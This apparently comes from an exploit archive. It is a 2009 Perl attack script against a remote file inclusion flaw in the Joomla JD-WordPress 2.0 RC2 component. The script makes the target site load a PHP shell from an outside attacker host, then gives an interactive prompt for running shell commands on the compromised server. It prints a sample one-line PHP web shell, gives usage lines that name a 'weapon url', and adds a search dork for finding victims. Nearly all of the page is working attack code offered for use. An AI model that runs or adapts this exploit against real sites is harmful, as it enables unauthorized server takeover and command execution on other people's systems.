[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla JD-WordPress 2.0 RC2 remote file icnlusion
# Published : 2009-10-19
# Author : Don Tukulesto
# Previous Title : Joomla Book Library 1.0 file inclusion
# Next Title : phpCMS 2008 file disclosure
#!/usr/bin/perl
#####
# [+] Author : Don Tukulesto (root@indonesiancoder.com)
# [+] Date : October 20, 2009
# [+] Homepage : http://www.indonesiancoder.com
# [+] Vendor : www.joomladeveloping.org
# [+] version : 2.0 RC2
# [+] Method : Remote File Inclusion
# [+] Dork : "Kill-9"+"IndonesianCoder"
# [+] Location : INDONESIA
# [~] Notes : Jika kami bersama, Nyalakan tanda bahaya. Jika kami berpesta, Hening akan terpecah.
# Aku dia dan mereka, Memang gila memang beda. Tak perlu berpura pura, Memang begini adanya. ( SupermanIsDead ft. Shaggy Dog )
# to M3NW5 : Kembalilah ke jalan mu nak, jangan berpaling dari "Nya"
# to kaMtiEz : thx yah !!!! � 15 Jam dapet hasil jg :"> ( tunggulah aku di kotamu )
# to MALINGSIAL : TRULLY THIEF IN ASIA ! N.A.T.O BIATCH !
# [~] How To :
# perl tux.pl <target> <weapon url> cmd
# perl tux.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <?php system($_GET['cmd']); ?>
#####
use HTTP::Request;
use LWP::UserAgent;
$Tux = $ARGV[0];
$Pathloader = $ARGV[1];
$Contrex = $ARGV[2];
if($Tux!~/http:/// || $Pathloader!~/http:/// || !$Contrex){usage()}
head();
sub head()
{
print "[o]============================================================================[o]rn";
print " | Joomla JD-WordPress Vulnerability File Inclusion |rn";
print "[o]============================================================================[o]rn";
}
while()
{
print "[w00t] $";
while(<STDIN>)
{
$kaMtiEz=$_;
chomp($kaMtiEz);
$arianom = LWP::UserAgent->new() or die;
$tiw0L = HTTP::Request->new(GET =>$Tux.'components/com_jd-wp/wp-feed.php?mosConfig_absolute_path='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "nCould Not connectn";
$abah_benu = $arianom->request($tiw0L);
$tukulesto = $abah_benu->content;
$tukulesto =~ tr/[n]/[�]/;
if (!$kaMtiEz) {print "nPlease Enter a Commandnn"; $tukulesto ="";}
elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /)
{print "nCann't Connect to cmd Host or Invalid Commandn";exit}
elsif ($tukulesto =~/^<br./>.<b>Fatal.error/) {print "nInvalid Command or No Returnnn"}
if($tukulesto =~ /(.*)/)
{
$finreturn = $1;
$finreturn=~ tr/[�]/[n]/;
print "rn$finreturnnr";
last;
}
else {print "[w00t] $";}}}last;
sub usage()
{
head();
print " | Usage: perl tux.pl <target> <weapon url> <cmd> |rn";
print " | <Site> - Full path to execute ex: http://127.0.0.1/path/ |rn";
print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt |rn";
print " | <cmd> - Command variable used in php shell |rn";
print "[o]============================================================================[o]rn";
print " | IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org |rn";
print " | kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S |rn";
print " | Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint |rn";
print " | Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! |rn";
print "[o]============================================================================[o]rn";
print " | http://www.IndonesianCoder.org | http://www.AntiSecRadio.fm |rn";
print "[o]============================================================================[o]rn";
exit();
}